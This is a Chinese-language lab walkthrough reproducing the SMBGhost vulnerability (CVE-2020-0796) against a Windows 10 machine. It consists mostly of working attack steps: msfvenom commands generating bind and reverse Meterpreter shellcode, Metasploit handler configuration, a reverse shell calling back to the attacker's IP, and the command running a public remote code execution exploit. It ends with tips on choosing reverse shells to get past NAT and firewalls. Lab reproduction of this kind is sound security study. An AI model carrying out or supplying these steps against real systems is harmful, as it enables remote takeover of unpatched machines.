win10—SMB3_CVE-2020-0796复现

0x01 准备工作

  1. 环境
    • 被攻击点:Microsoft Windows 10(1903)- 192.168.0.26
    • 攻击机:kali - 192.168.0.23
  2. 工具

0x02 扫描确认漏洞是否存在

​ 直接使用奇安信的扫描工具,扫描目标系统是否存在漏洞。

下载链接:http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip

扫描目标系统

0x03 生成payload并攻击

  1. msf正向连接Shell

    a. 生成payload

1
msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=81 -b '\x00' -f python

生成payload1

​ b. 复制buf,修改SMBGhost_RCE_PoC中USER_PAYLOAD变量为payload

修改exp

​ c. msf开启监听

1
2
3
4
5
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set LPORT 81
set RHOST 192.168.0.26
exploit

​ d. 运行exploit.py,发送payload

1
python3 exploit.py -ip 192.168.0.26

正向getshell

  1. msf反向反弹Shell

    a. 生成payload

1
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.0.23 LPORT=80 -b '\x00' -f python

生成payload1

​ b. 修改SMBGhost_RCE_PoC中USER_PAYLOAD变量

​ c. msf开启监听

1
2
3
4
5
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set LPORT 80
set LHOST 192.168.0.23
exploit

​ d. 运行exploit.py,发送payload

1
python3 exploit.py -ip 192.168.0.26

反向getshell

0x04 小坑和总结

  1. 可以根据实际情况生成payload,即实际网络环境来决定正向还是反向,大多数内网环境由于NAT转换和边界防火墙导致不能直接访问内网的服务,还是建议用反向的将目标权限反弹出来。
  2. 测试的时候目标机器在另一台物理机,本来想远程上去,一起截图证明一下,后台发现,远程的时候,发送反向的payload会导致蓝屏,具体原因没分析。
  3. 测试了Cobalt Strike生成的payload,一打就蓝屏,原因不知道,但是还是希望能用cs搞,cs还是好用些。